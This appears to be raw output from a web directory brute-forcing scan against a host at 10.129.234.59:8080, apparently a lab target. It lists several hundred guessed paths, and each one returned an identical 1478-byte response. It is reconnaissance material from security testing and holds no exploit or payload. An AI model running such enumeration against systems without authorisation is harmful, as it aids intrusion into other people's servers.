200      GET       46l      151w     1478c http://10.129.234.59:8080/BLOG
200      GET       46l      151w     1478c http://10.129.234.59:8080/AU
200      GET       46l      151w     1478c http://10.129.234.59:8080/DOC
200      GET       46l      151w     1478c http://10.129.234.59:8080/DatePicker
200      GET       46l      151w     1478c http://10.129.234.59:8080/DataAccess
200      GET       46l      151w     1478c http://10.129.234.59:8080/DevExpress
200      GET       46l      151w     1478c http://10.129.234.59:8080/Developer
200      GET       46l      151w     1478c http://10.129.234.59:8080/DOWNLOADS
200      GET       46l      151w     1478c http://10.129.234.59:8080/FreeTextBox
200      GET       46l      151w     1478c http://10.129.234.59:8080/Hosting
200      GET       46l      151w     1478c http://10.129.234.59:8080/GS
200      GET       46l      151w     1478c http://10.129.234.59:8080/GRAPHICS
200      GET       46l      151w     1478c http://10.129.234.59:8080/IM
200      GET       46l      151w     1478c http://10.129.234.59:8080/NEWTCore
200      GET       46l      151w     1478c http://10.129.234.59:8080/PG
200      GET       46l      151w     1478c http://10.129.234.59:8080/PhotoAlbums
200      GET       46l      151w     1478c http://10.129.234.59:8080/Pager
200      GET       46l      151w     1478c http://10.129.234.59:8080/PhotoGallery
200      GET       46l      151w     1478c http://10.129.234.59:8080/PHOTOS
200      GET       46l      151w     1478c http://10.129.234.59:8080/Photography
200      GET       46l      151w     1478c http://10.129.234.59:8080/Planning
200      GET       46l      151w     1478c http://10.129.234.59:8080/Politics
200      GET       46l      151w     1478c http://10.129.234.59:8080/Policy
200      GET       46l      151w     1478c http://10.129.234.59:8080/Reference
200      GET       46l      151w     1478c http://10.129.234.59:8080/TODO
200      GET       46l      151w     1478c http://10.129.234.59:8080/Thumbnails
200      GET       46l      151w     1478c http://10.129.234.59:8080/VIDEO
200      GET       46l      151w     1478c http://10.129.234.59:8080/V4
200      GET       46l      151w     1478c http://10.129.234.59:8080/WebEditor
200      GET       46l      151w     1478c http://10.129.234.59:8080/Weddings
200      GET       46l      151w     1478c http://10.129.234.59:8080/_cs_upload
200      GET       46l      151w     1478c http://10.129.234.59:8080/_webalizer
200      GET       46l      151w     1478c http://10.129.234.59:8080/_vti_shm
200      GET       46l      151w     1478c http://10.129.234.59:8080/aaron
200      GET       46l      151w     1478c http://10.129.234.59:8080/admin_files
200      GET       46l      151w     1478c http://10.129.234.59:8080/ads1
200      GET       46l      151w     1478c http://10.129.234.59:8080/adults
200      GET       46l      151w     1478c http://10.129.234.59:8080/athens
200      GET       46l      151w     1478c http://10.129.234.59:8080/ats
200      GET       46l      151w     1478c http://10.129.234.59:8080/automation
200      GET       46l      151w     1478c http://10.129.234.59:8080/bbm
200      GET       46l      151w     1478c http://10.129.234.59:8080/no-gb
200      GET       46l      151w     1478c http://10.129.234.59:8080/ri-fr
200      GET       46l      151w     1478c http://10.129.234.59:8080/ro-gb
200      GET       46l      151w     1478c http://10.129.234.59:8080/ru-gb
200      GET       46l      151w     1478c http://10.129.234.59:8080/caboose
200      GET       46l      151w     1478c http://10.129.234.59:8080/ccmail
200      GET       46l      151w     1478c http://10.129.234.59:8080/cfs
200      GET       46l      151w     1478c http://10.129.234.59:8080/cetelem
200      GET       46l      151w     1478c http://10.129.234.59:8080/ctrack
200      GET       46l      151w     1478c http://10.129.234.59:8080/curso
200      GET       46l      151w     1478c http://10.129.234.59:8080/dlc
200      GET       46l      151w     1478c http://10.129.234.59:8080/edit_page
200      GET       46l      151w     1478c http://10.129.234.59:8080/emailseller
200      GET       46l      151w     1478c http://10.129.234.59:8080/encrypt
200      GET       46l      151w     1478c http://10.129.234.59:8080/flirt
200      GET       46l      151w     1478c http://10.129.234.59:8080/formgen
200      GET       46l      151w     1478c http://10.129.234.59:8080/formtools
200      GET       46l      151w     1478c http://10.129.234.59:8080/guestbooks
200      GET       46l      151w     1478c http://10.129.234.59:8080/linkimages
200      GET       46l      151w     1478c http://10.129.234.59:8080/mediaroom
200      GET       46l      151w     1478c http://10.129.234.59:8080/my_admin
200      GET       46l      151w     1478c http://10.129.234.59:8080/mydata
200      GET       46l      151w     1478c http://10.129.234.59:8080/nada
200      GET       46l      151w     1478c http://10.129.234.59:8080/myweb
200      GET       46l      151w     1478c http://10.129.234.59:8080/newsarchive
200      GET       46l      151w     1478c http://10.129.234.59:8080/print_listing
200      GET       46l      151w     1478c http://10.129.234.59:8080/pri
200      GET       46l      151w     1478c http://10.129.234.59:8080/processus
200      GET       46l      151w     1478c http://10.129.234.59:8080/raffle
200      GET       46l      151w     1478c http://10.129.234.59:8080/rar
200      GET       46l      151w     1478c http://10.129.234.59:8080/remository
200      GET       46l      151w     1478c http://10.129.234.59:8080/reporter
200      GET       46l      151w     1478c http://10.129.234.59:8080/s3
200      GET       46l      151w     1478c http://10.129.234.59:8080/sender
200      GET       46l      151w     1478c http://10.129.234.59:8080/stallions
200      GET       46l      151w     1478c http://10.129.234.59:8080/tekipedia
200      GET       46l      151w     1478c http://10.129.234.59:8080/testy
200      GET       46l      151w     1478c http://10.129.234.59:8080/tubes
200      GET       46l      151w     1478c http://10.129.234.59:8080/vanilla
200      GET       46l      151w     1478c http://10.129.234.59:8080/watchlist
200      GET       46l      151w     1478c http://10.129.234.59:8080/watchdog
200      GET       46l      151w     1478c http://10.129.234.59:8080/objectremove
200      GET       46l      151w     1478c http://10.129.234.59:8080/162
200      GET       46l      151w     1478c http://10.129.234.59:8080/257
200      GET       46l      151w     1478c http://10.129.234.59:8080/130
200      GET       46l      151w     1478c http://10.129.234.59:8080/Alaska
200      GET       46l      151w     1478c http://10.129.234.59:8080/App_Date
200      GET       46l      151w     1478c http://10.129.234.59:8080/App_
200      GET       46l      151w     1478c http://10.129.234.59:8080/DM
200      GET       46l      151w     1478c http://10.129.234.59:8080/Fun
200      GET       46l      151w     1478c http://10.129.234.59:8080/Originals
200      GET       46l      151w     1478c http://10.129.234.59:8080/PE
200      GET       46l      151w     1478c http://10.129.234.59:8080/Original
200      GET       46l      151w     1478c http://10.129.234.59:8080/Picture
200      GET       46l      151w     1478c http://10.129.234.59:8080/Perl
200      GET       46l      151w     1478c http://10.129.234.59:8080/SWC
200      GET       46l      151w     1478c http://10.129.234.59:8080/SUPPORT
200      GET       46l      151w     1478c http://10.129.234.59:8080/SpecialPages
200      GET       46l      151w     1478c http://10.129.234.59:8080/URLs
200      GET       46l      151w     1478c http://10.129.234.59:8080/UserAccount
200      GET       46l      151w     1478c http://10.129.234.59:8080/Usercontrols
200      GET       46l      151w     1478c http://10.129.234.59:8080/WebCatalog
200      GET       46l      151w     1478c http://10.129.234.59:8080/WebCalendar
200      GET       46l      151w     1478c http://10.129.234.59:8080/___test
200      GET       46l      151w     1478c http://10.129.234.59:8080/_static
200      GET       46l      151w     1478c http://10.129.234.59:8080/adminz
200      GET       46l      151w     1478c http://10.129.234.59:8080/anexos
200      GET       46l      151w     1478c http://10.129.234.59:8080/appform
200      GET       46l      151w     1478c http://10.129.234.59:8080/app_masterpages
200      GET       46l      151w     1478c http://10.129.234.59:8080/audience
200      GET       46l      151w     1478c http://10.129.234.59:8080/audio_swap
200      GET       46l      151w     1478c http://10.129.234.59:8080/auguri
200      GET       46l      151w     1478c http://10.129.234.59:8080/backofficelite
200      GET       46l      151w     1478c http://10.129.234.59:8080/avn
200      GET       46l      151w     1478c http://10.129.234.59:8080/avisolegal
200      GET       46l      151w     1478c http://10.129.234.59:8080/b2evolution
200      GET       46l      151w     1478c http://10.129.234.59:8080/badmin
200      GET       46l      151w     1478c http://10.129.234.59:8080/bandeaux
200      GET       46l      151w     1478c http://10.129.234.59:8080/banken
200      GET       46l      151w     1478c http://10.129.234.59:8080/bcp
200      GET       46l      151w     1478c http://10.129.234.59:8080/belgium
200      GET       46l      151w     1478c http://10.129.234.59:8080/belegung
200      GET       46l      151w     1478c http://10.129.234.59:8080/savemulti
200      GET       46l      151w     1478c http://10.129.234.59:8080/chad
200      GET       46l      151w     1478c http://10.129.234.59:8080/chat1
200      GET       46l      151w     1478c http://10.129.234.59:8080/common_files
200      GET       46l      151w     1478c http://10.129.234.59:8080/common_images
200      GET       46l      151w     1478c http://10.129.234.59:8080/concierge
200      GET       46l      151w     1478c http://10.129.234.59:8080/compressiontest
200      GET       46l      151w     1478c http://10.129.234.59:8080/productpopin
200      GET       46l      151w     1478c http://10.129.234.59:8080/coveo
200      GET       46l      151w     1478c http://10.129.234.59:8080/csl
200      GET       46l      151w     1478c http://10.129.234.59:8080/cycling
200      GET       46l      151w     1478c http://10.129.234.59:8080/data-files
200      GET       46l      151w     1478c http://10.129.234.59:8080/dao
200      GET       46l      151w     1478c http://10.129.234.59:8080/denmark
200      GET       46l      151w     1478c http://10.129.234.59:8080/denies
200      GET       46l      151w     1478c http://10.129.234.59:8080/dow
200      GET       46l      151w     1478c http://10.129.234.59:8080/enewsletters
200      GET       46l      151w     1478c http://10.129.234.59:8080/exercises
200      GET       46l      151w     1478c http://10.129.234.59:8080/subst
200      GET       46l      151w     1478c http://10.129.234.59:8080/faculties
200      GET       46l      151w     1478c http://10.129.234.59:8080/faculty_staff
200      GET       46l      151w     1478c http://10.129.234.59:8080/favicons
200      GET       46l      151w     1478c http://10.129.234.59:8080/felix
200      GET       46l      151w     1478c http://10.129.234.59:8080/filecache
200      GET       46l      151w     1478c http://10.129.234.59:8080/fms
200      GET       46l      151w     1478c http://10.129.234.59:8080/foretag
200      GET       46l      151w     1478c http://10.129.234.59:8080/globe
200      GET       46l      151w     1478c http://10.129.234.59:8080/go-to
200      GET       46l      151w     1478c http://10.129.234.59:8080/hans
200      GET       46l      151w     1478c http://10.129.234.59:8080/henry
200      GET       46l      151w     1478c http://10.129.234.59:8080/hpc
200      GET       46l      151w     1478c http://10.129.234.59:8080/hotsite
200      GET       46l      151w     1478c http://10.129.234.59:8080/i-mode
200      GET       46l      151w     1478c http://10.129.234.59:8080/hwdphotos
200      GET       46l      151w     1478c http://10.129.234.59:8080/imgcache
200      GET       46l      151w     1478c http://10.129.234.59:8080/indir
200      GET       46l      151w     1478c http://10.129.234.59:8080/informes
200      GET       46l      151w     1478c http://10.129.234.59:8080/informazioni
200      GET       46l      151w     1478c http://10.129.234.59:8080/kasse
200      GET       46l      151w     1478c http://10.129.234.59:8080/keeps
200      GET       46l      151w     1478c http://10.129.234.59:8080/librairie
200      GET       46l      151w     1478c http://10.129.234.59:8080/html_snippets
200      GET       46l      151w     1478c http://10.129.234.59:8080/linked
200      GET       46l      151w     1478c http://10.129.234.59:8080/linkpartners
200      GET       46l      151w     1478c http://10.129.234.59:8080/linktracker
200      GET       46l      151w     1478c http://10.129.234.59:8080/linkspider
200      GET       46l      151w     1478c http://10.129.234.59:8080/logreport
200      GET       46l      151w     1478c http://10.129.234.59:8080/memberlogin
200      GET       46l      151w     1478c http://10.129.234.59:8080/metki
200      GET       46l      151w     1478c http://10.129.234.59:8080/metatraffic
200      GET       46l      151w     1478c http://10.129.234.59:8080/modules_profile
200      GET       46l      151w     1478c http://10.129.234.59:8080/multisites
200      GET       46l      151w     1478c http://10.129.234.59:8080/murcia
200      GET       46l      151w     1478c http://10.129.234.59:8080/Foreclosure
200      GET       46l      151w     1478c http://10.129.234.59:8080/mysimpleads
200      GET       46l      151w     1478c http://10.129.234.59:8080/nadmin
200      GET       46l      151w     1478c http://10.129.234.59:8080/nanke
200      GET       46l      151w     1478c http://10.129.234.59:8080/nac
200      GET       46l      151w     1478c http://10.129.234.59:8080/newpics
200      GET       46l      151w     1478c http://10.129.234.59:8080/ofc
200      GET       46l      151w     1478c http://10.129.234.59:8080/older
200      GET       46l      151w     1478c http://10.129.234.59:8080/origin
200      GET       46l      151w     1478c http://10.129.234.59:8080/pbp
200      GET       46l      151w     1478c http://10.129.234.59:8080/pcm
200      GET       46l      151w     1478c http://10.129.234.59:8080/php-stats
200      GET       46l      151w     1478c http://10.129.234.59:8080/phpmy
200      GET       46l      151w     1478c http://10.129.234.59:8080/phpcalendar
200      GET       46l      151w     1478c http://10.129.234.59:8080/php_include
200      GET       46l      151w     1478c http://10.129.234.59:8080/phpmail
200      GET       46l      151w     1478c http://10.129.234.59:8080/add_post
200      GET       46l      151w     1478c http://10.129.234.59:8080/pongal
200      GET       46l      151w     1478c http://10.129.234.59:8080/remove_post
200      GET       46l      151w     1478c http://10.129.234.59:8080/pop_ups
200      GET       46l      151w     1478c http://10.129.234.59:8080/themes_c
200      GET       46l      151w     1478c http://10.129.234.59:8080/realmedia
200      GET       46l      151w     1478c http://10.129.234.59:8080/road
200      GET       46l      151w     1478c http://10.129.234.59:8080/sanjose
200      GET       46l      151w     1478c http://10.129.234.59:8080/specific
200      GET       46l      151w     1478c http://10.129.234.59:8080/stompervideo
200      GET       46l      151w     1478c http://10.129.234.59:8080/surgery
200      GET       46l      151w     1478c http://10.129.234.59:8080/surfing
200      GET       46l      151w     1478c http://10.129.234.59:8080/sverige
200      GET       46l      151w     1478c http://10.129.234.59:8080/superuser
200      GET       46l      151w     1478c http://10.129.234.59:8080/edmenu
200      GET       46l      151w     1478c http://10.129.234.59:8080/tenant
200      GET       46l      151w     1478c http://10.129.234.59:8080/test-site
200      GET       46l      151w     1478c http://10.129.234.59:8080/testimages
200      GET       46l      151w     1478c http://10.129.234.59:8080/timesheets
200      GET       46l      151w     1478c http://10.129.234.59:8080/tin-tuc
200      GET       46l      151w     1478c http://10.129.234.59:8080/tld
200      GET       46l      151w     1478c http://10.129.234.59:8080/tiny
200      GET       46l      151w     1478c http://10.129.234.59:8080/viz
200      GET       46l      151w     1478c http://10.129.234.59:8080/tribute
200      GET       46l      151w     1478c http://10.129.234.59:8080/utilidades
200      GET       46l      151w     1478c http://10.129.234.59:8080/uzivatel
200      GET       46l      151w     1478c http://10.129.234.59:8080/v10
200      GET       46l      151w     1478c http://10.129.234.59:8080/vanguard
200      GET       46l      151w     1478c http://10.129.234.59:8080/verizon
200      GET       46l      151w     1478c http://10.129.234.59:8080/vg1
200      GET       46l      151w     1478c http://10.129.234.59:8080/vietnam
200      GET       46l      151w     1478c http://10.129.234.59:8080/2xfun1970
200      GET       46l      151w     1478c http://10.129.234.59:8080/TT2483
200      GET       46l      151w     1478c http://10.129.234.59:8080/gd-star-rating
200      GET       46l      151w     1478c http://10.129.234.59:8080/spritegen
200      GET       46l      151w     1478c http://10.129.234.59:8080/viewattachrev
200      GET       46l      151w     1478c http://10.129.234.59:8080/ymix
200      GET       46l      151w     1478c http://10.129.234.59:8080/127
200      GET       46l      151w     1478c http://10.129.234.59:8080/153
200      GET       46l      151w     1478c http://10.129.234.59:8080/1371
200      GET       46l      151w     1478c http://10.129.234.59:8080/149
200      GET       46l      151w     1478c http://10.129.234.59:8080/184
200      GET       46l      151w     1478c http://10.129.234.59:8080/263
200      GET       46l      151w     1478c http://10.129.234.59:8080/256
200      GET       46l      151w     1478c http://10.129.234.59:8080/290
200      GET       46l      151w     1478c http://10.129.234.59:8080/331
200      GET       46l      151w     1478c http://10.129.234.59:8080/332
200      GET       46l      151w     1478c http://10.129.234.59:8080/333
200      GET       46l      151w     1478c http://10.129.234.59:8080/341
200      GET       46l      151w     1478c http://10.129.234.59:8080/885
200      GET       46l      151w     1478c http://10.129.234.59:8080/imagepages
200      GET       46l      151w     1478c http://10.129.234.59:8080/how-to-buy
200      GET       46l      151w     1478c http://10.129.234.59:8080/0-NEWSTORE
200      GET       46l      151w     1478c http://10.129.234.59:8080/007
200      GET       46l      151w     1478c http://10.129.234.59:8080/0000
200      GET       46l      151w     1478c http://10.129.234.59:8080/A5
200      GET       46l      151w     1478c http://10.129.234.59:8080/A3
200      GET       46l      151w     1478c http://10.129.234.59:8080/ACC
200      GET       46l      151w     1478c http://10.129.234.59:8080/AI
200      GET       46l      151w     1478c http://10.129.234.59:8080/AFP
200      GET       46l      151w     1478c http://10.129.234.59:8080/ASPxGrid
200      GET       46l      151w     1478c http://10.129.234.59:8080/ASPSpellCheck
200      GET       46l      151w     1478c http://10.129.234.59:8080/Adult
200      GET       46l      151w     1478c http://10.129.234.59:8080/CMSLayouts
200      GET       46l      151w     1478c http://10.129.234.59:8080/CZ
200      GET       46l      151w     1478c http://10.129.234.59:8080/Candidate
200      GET       46l      151w     1478c http://10.129.234.59:8080/Crafts
200      GET       46l      151w     1478c http://10.129.234.59:8080/Creative
200      GET       46l      151w     1478c http://10.129.234.59:8080/Custom_modules
200      GET       46l      151w     1478c http://10.129.234.59:8080/DTD
200      GET       46l      151w     1478c http://10.129.234.59:8080/Databackup
200      GET       46l      151w     1478c http://10.129.234.59:8080/DateRange
200      GET       46l      151w     1478c http://10.129.234.59:8080/DownImg
200      GET       46l      151w     1478c http://10.129.234.59:8080/Drivers
200      GET       46l      151w     1478c http://10.129.234.59:8080/GCshared
200      GET       46l      151w     1478c http://10.129.234.59:8080/GC
200      GET       46l      151w     1478c http://10.129.234.59:8080/Gifts
200      GET       46l      151w     1478c http://10.129.234.59:8080/Headers
200      GET       46l      151w     1478c http://10.129.234.59:8080/HiQFM
200      GET       46l      151w     1478c http://10.129.234.59:8080/HolidaySaving
200      GET       46l      151w     1478c http://10.129.234.59:8080/Lab
200      GET       46l      151w     1478c http://10.129.234.59:8080/MEMBERS
200      GET       46l      151w     1478c http://10.129.234.59:8080/MH
200      GET       46l      151w     1478c http://10.129.234.59:8080/MLS
200      GET       46l      151w     1478c http://10.129.234.59:8080/Messaging
200      GET       46l      151w     1478c http://10.129.234.59:8080/Meta
200      GET       46l      151w     1478c http://10.129.234.59:8080/NAHIMembership
200      GET       46l      151w     1478c http://10.129.234.59:8080/My97DatePicker
200      GET       46l      151w     1478c http://10.129.234.59:8080/MyWeb
200      GET       46l      151w     1478c http://10.129.234.59:8080/Oregon
200      GET       46l      151w     1478c http://10.129.234.59:8080/PDGImages
200      GET       46l      151w     1478c http://10.129.234.59:8080/PNGs
200      GET       46l      151w     1478c http://10.129.234.59:8080/PJImages
200      GET       46l      151w     1478c http://10.129.234.59:8080/PMA
200      GET       46l      151w     1478c http://10.129.234.59:8080/PopUp
200      GET       46l      151w     1478c http://10.129.234.59:8080/Remote
200      GET       46l      151w     1478c http://10.129.234.59:8080/Science
200      GET       46l      151w     1478c http://10.129.234.59:8080/SiteContent
200      GET       46l      151w     1478c http://10.129.234.59:8080/StyleSheet
200      GET       46l      151w     1478c http://10.129.234.59:8080/Subscribe
200      GET       46l      151w     1478c http://10.129.234.59:8080/Submit
200      GET       46l      151w     1478c http://10.129.234.59:8080/Structures
200      GET       46l      151w     1478c http://10.129.234.59:8080/Tutorial
200      GET       46l      151w     1478c http://10.129.234.59:8080/WKIMAGES
200      GET       46l      151w     1478c http://10.129.234.59:8080/WebMaster
200      GET       46l      151w     1478c http://10.129.234.59:8080/_client
200      GET       46l      151w     1478c http://10.129.234.59:8080/_dbadmin
200      GET       46l      151w     1478c http://10.129.234.59:8080/_disc
200      GET       46l      151w     1478c http://10.129.234.59:8080/aaasc
200      GET       46l      151w     1478c http://10.129.234.59:8080/add_to_cart
200      GET       46l      151w     1478c http://10.129.234.59:8080/addsearch
200      GET       46l      151w     1478c http://10.129.234.59:8080/admin_scripts
200      GET       46l      151w     1478c http://10.129.234.59:8080/admin_site
200      GET       46l      151w     1478c http://10.129.234.59:8080/aggancixml
200      GET       46l      151w     1478c http://10.129.234.59:8080/agilent
200      GET       46l      151w     1478c http://10.129.234.59:8080/agences
200      GET       46l      151w     1478c http://10.129.234.59:8080/Colgate
200      GET       46l      151w     1478c http://10.129.234.59:8080/app_cms
200      GET       46l      151w     1478c http://10.129.234.59:8080/appli
200      GET       46l      151w     1478c http://10.129.234.59:8080/arenda
200      GET       46l      151w     1478c http://10.129.234.59:8080/areaclienti
200      GET       46l      151w     1478c http://10.129.234.59:8080/aqua
200      GET       46l      151w     1478c http://10.129.234.59:8080/arg
200      GET       46l      151w     1478c http://10.129.234.59:8080/armory
200      GET       46l      151w     1478c http://10.129.234.59:8080/axa
200      GET       46l      151w     1478c http://10.129.234.59:8080/bacheca
200      GET       46l      151w     1478c http://10.129.234.59:8080/babynames
200      GET       46l      151w     1478c http://10.129.234.59:8080/bannerrotator
200      GET       46l      151w     1478c http://10.129.234.59:8080/bil
200      GET       46l      151w     1478c http://10.129.234.59:8080/blockPages
200      GET       46l      151w     1478c http://10.129.234.59:8080/boletos
200      GET       46l      151w     1478c http://10.129.234.59:8080/boatwizard
200      GET       46l      151w     1478c http://10.129.234.59:8080/bruce
200      GET       46l      151w     1478c http://10.129.234.59:8080/buffalo
200      GET       46l      151w     1478c http://10.129.234.59:8080/bugang
200      GET       46l      151w     1478c http://10.129.234.59:8080/bundle
200      GET       46l      151w     1478c http://10.129.234.59:8080/cache_html
200      GET       46l      151w     1478c http://10.129.234.59:8080/ca-en
200      GET       46l      151w     1478c http://10.129.234.59:8080/cabinets
200      GET       46l      151w     1478c http://10.129.234.59:8080/cache_page
200      GET       46l      151w     1478c http://10.129.234.59:8080/cclogos
200      GET       46l      151w     1478c http://10.129.234.59:8080/client_uploads
200      GET       46l      151w     1478c http://10.129.234.59:8080/159
200      GET       46l      151w     1478c http://10.129.234.59:8080/contattaci
200      GET       46l      151w     1478c http://10.129.234.59:8080/controles
200      GET       46l      151w     1478c http://10.129.234.59:8080/controls-infra
200      GET       46l      151w     1478c http://10.129.234.59:8080/courseware
200      GET       46l      151w     1478c http://10.129.234.59:8080/cpd
200      GET       46l      151w     1478c http://10.129.234.59:8080/d1
200      GET       46l      151w     1478c http://10.129.234.59:8080/danny
200      GET       46l      151w     1478c http://10.129.234.59:8080/dash
200      GET       46l      151w     1478c http://10.129.234.59:8080/DomainList
200      GET       46l      151w     1478c http://10.129.234.59:8080/disclaim
200      GET       46l      151w     1478c http://10.129.234.59:8080/diskuze
200      GET       46l      151w     1478c http://10.129.234.59:8080/disk
200      GET       46l      151w     1478c http://10.129.234.59:8080/diseno
200      GET       46l      151w     1478c http://10.129.234.59:8080/done
200      GET       46l      151w     1478c http://10.129.234.59:8080/dostupnost
200      GET       46l      151w     1478c http://10.129.234.59:8080/ethan
200      GET       46l      151w     1478c http://10.129.234.59:8080/ewebeditpro2
200      GET       46l      151w     1478c http://10.129.234.59:8080/evps
200      GET       46l      151w     1478c http://10.129.234.59:8080/fields
200      GET       46l      151w     1478c http://10.129.234.59:8080/filebase
200      GET       46l      151w     1478c http://10.129.234.59:8080/filelib
200      GET       46l      151w     1478c http://10.129.234.59:8080/filmy
200      GET       46l      151w     1478c http://10.129.234.59:8080/fisheye
200      GET       46l      151w     1478c http://10.129.234.59:8080/formularze
200      GET       46l      151w     1478c http://10.129.234.59:8080/forum218
200      GET       46l      151w     1478c http://10.129.234.59:8080/freelist
200      GET       46l      151w     1478c http://10.129.234.59:8080/freeoffer
200      GET       46l      151w     1478c http://10.129.234.59:8080/freedownloads
200      GET       46l      151w     1478c http://10.129.234.59:8080/gambar
200      GET       46l      151w     1478c http://10.129.234.59:8080/hangman
200      GET       46l      151w     1478c http://10.129.234.59:8080/gambling
200      GET       46l      151w     1478c http://10.129.234.59:8080/graphx
200      GET       46l      151w     1478c http://10.129.234.59:8080/gretta
200      GET       46l      151w     1478c http://10.129.234.59:8080/gts
200      GET       46l      151w     1478c http://10.129.234.59:8080/gst
200      GET       46l      151w     1478c http://10.129.234.59:8080/graphics2
200      GET       46l      151w     1478c http://10.129.234.59:8080/gym_sitemaps
200      GET       46l      151w     1478c http://10.129.234.59:8080/habitat
200      GET       46l      151w     1478c http://10.129.234.59:8080/hterror
200      GET       46l      151w     1478c http://10.129.234.59:8080/portlet
200      GET       46l      151w     1478c http://10.129.234.59:8080/html_templates
200      GET       46l      151w     1478c http://10.129.234.59:8080/ignite
200      GET       46l      151w     1478c http://10.129.234.59:8080/iisadmin
200      GET       46l      151w     1478c http://10.129.234.59:8080/ikons
200      GET       46l      151w     1478c http://10.129.234.59:8080/imagemagick
200      GET       46l      151w     1478c http://10.129.234.59:8080/images-working
200      GET       46l      151w     1478c http://10.129.234.59:8080/imdb
200      GET       46l      151w     1478c http://10.129.234.59:8080/innermenu
200      GET       46l      151w     1478c http://10.129.234.59:8080/inregistrare
200      GET       46l      151w     1478c http://10.129.234.59:8080/inserate
200      GET       46l      151w     1478c http://10.129.234.59:8080/ips_rich_content
200      GET       46l      151w     1478c http://10.129.234.59:8080/jira
200      GET       46l      151w     1478c http://10.129.234.59:8080/jiudian
200      GET       46l      151w     1478c http://10.129.234.59:8080/jobpost
200      GET       46l      151w     1478c http://10.129.234.59:8080/joomladev
200      GET       46l      151w     1478c http://10.129.234.59:8080/joshua
200      GET       46l      151w     1478c http://10.129.234.59:8080/kate
200      GET       46l      151w     1478c http://10.129.234.59:8080/katie
200      GET       46l      151w     1478c http://10.129.234.59:8080/kcrw
200      GET       46l      151w     1478c http://10.129.234.59:8080/knitting
200      GET       46l      151w     1478c http://10.129.234.59:8080/knowhow
200      GET       46l      151w     1478c http://10.129.234.59:8080/lightbox_assets
200      GET       46l      151w     1478c http://10.129.234.59:8080/livre
200      GET       46l      151w     1478c http://10.129.234.59:8080/mailing-manager
200      GET       46l      151w     1478c http://10.129.234.59:8080/manutencao
200      GET       46l      151w     1478c http://10.129.234.59:8080/mapaweb
200      GET       46l      151w     1478c http://10.129.234.59:8080/marshall
200      GET       46l      151w     1478c http://10.129.234.59:8080/messageboards
200      GET       46l      151w     1478c http://10.129.234.59:8080/midia
200      GET       46l      151w     1478c http://10.129.234.59:8080/mig
200      GET       46l      151w     1478c http://10.129.234.59:8080/middle
200      GET       46l      151w     1478c http://10.129.234.59:8080/mobile-phones
200      GET       46l      151w     1478c http://10.129.234.59:8080/mypictures
200      GET       46l      151w     1478c http://10.129.234.59:8080/mystar
200      GET       46l      151w     1478c http://10.129.234.59:8080/myphp
200      GET       46l      151w     1478c http://10.129.234.59:8080/neomail
200      GET       46l      151w     1478c http://10.129.234.59:8080/ncs
200      GET       46l      151w     1478c http://10.129.234.59:8080/netrics
200      GET       46l      151w     1478c http://10.129.234.59:8080/nettbutikk
200      GET       46l      151w     1478c http://10.129.234.59:8080/netstatus
200      GET       46l      151w     1478c http://10.129.234.59:8080/netcat_dump
200      GET       46l      151w     1478c http://10.129.234.59:8080/nestle
200      GET       46l      151w     1478c http://10.129.234.59:8080/netvolution
200      GET       46l      151w     1478c http://10.129.234.59:8080/new-hampshire
200      GET       46l      151w     1478c http://10.129.234.59:8080/nhsso
200      GET       46l      151w     1478c http://10.129.234.59:8080/norge
200      GET       46l      151w     1478c http://10.129.234.59:8080/north-dakota
200      GET       46l      151w     1478c http://10.129.234.59:8080/nos
200      GET       46l      151w     1478c http://10.129.234.59:8080/north-carolina
200      GET       46l      151w     1478c http://10.129.234.59:8080/nonexistent
200      GET       46l      151w     1478c http://10.129.234.59:8080/non-classe
200      GET       46l      151w     1478c http://10.129.234.59:8080/oldsites
200      GET       46l      151w     1478c http://10.129.234.59:8080/okladki
200      GET       46l      151w     1478c http://10.129.234.59:8080/DigiTrade
200      GET       46l      151w     1478c http://10.129.234.59:8080/padinfo
200      GET       46l      151w     1478c http://10.129.234.59:8080/position
200      GET       46l      151w     1478c http://10.129.234.59:8080/portlets
200      GET       46l      151w     1478c http://10.129.234.59:8080/postings
200      GET       46l      151w     1478c http://10.129.234.59:8080/portadas
200      GET       46l      151w     1478c http://10.129.234.59:8080/portraits
200      GET       46l      151w     1478c http://10.129.234.59:8080/porady
200      GET       46l      151w     1478c http://10.129.234.59:8080/postal
200      GET       46l      151w     1478c http://10.129.234.59:8080/pub3
200      GET       46l      151w     1478c http://10.129.234.59:8080/pwreset
200      GET       46l      151w     1478c http://10.129.234.59:8080/ptc
200      GET       46l      151w     1478c http://10.129.234.59:8080/publicity
200      GET       46l      151w     1478c http://10.129.234.59:8080/quellen
200      GET       46l      151w     1478c http://10.129.234.59:8080/recoverpassword
200      GET       46l      151w     1478c http://10.129.234.59:8080/recruiter
200      GET       46l      151w     1478c http://10.129.234.59:8080/relocation
200      GET       46l      151w     1478c http://10.129.234.59:8080/relatos
200      GET       46l      151w     1478c http://10.129.234.59:8080/remax
200      GET       46l      151w     1478c http://10.129.234.59:8080/remark
200      GET       46l      151w     1478c http://10.129.234.59:8080/resultados
200      GET       46l      151w     1478c http://10.129.234.59:8080/rezervace
200      GET       46l      151w     1478c http://10.129.234.59:8080/salesbarn
200      GET       46l      151w     1478c http://10.129.234.59:8080/salinas
200      GET       46l      151w     1478c http://10.129.234.59:8080/salute
200      GET       46l      151w     1478c http://10.129.234.59:8080/salvataggi
200      GET       46l      151w     1478c http://10.129.234.59:8080/seeds
200      GET       46l      151w     1478c http://10.129.234.59:8080/sendit
200      GET       46l      151w     1478c http://10.129.234.59:8080/send-email
200      GET       46l      151w     1478c http://10.129.234.59:8080/sen
200      GET       46l      151w     1478c http://10.129.234.59:8080/seo-services
200      GET       46l      151w     1478c http://10.129.234.59:8080/seo-tips
200      GET       46l      151w     1478c http://10.129.234.59:8080/sicilia
200      GET       46l      151w     1478c http://10.129.234.59:8080/shopsync
200      GET       46l      151w     1478c http://10.129.234.59:8080/sider
200      GET       46l      151w     1478c http://10.129.234.59:8080/sic
200      GET       46l      151w     1478c http://10.129.234.59:8080/sitedata
200      GET       46l      151w     1478c http://10.129.234.59:8080/stickymail
200      GET       46l      151w     1478c http://10.129.234.59:8080/stockphotos
200      GET       46l      151w     1478c http://10.129.234.59:8080/store_images
200      GET       46l      151w     1478c http://10.129.234.59:8080/straightstream
200      GET       46l      151w     1478c http://10.129.234.59:8080/store_pictures
200      GET       46l      151w     1478c http://10.129.234.59:8080/tamil
200      GET       46l      151w     1478c http://10.129.234.59:8080/tank
200      GET       46l      151w     1478c http://10.129.234.59:8080/tandc
200      GET       46l      151w     1478c http://10.129.234.59:8080/tms
200      GET       46l      151w     1478c http://10.129.234.59:8080/tristan
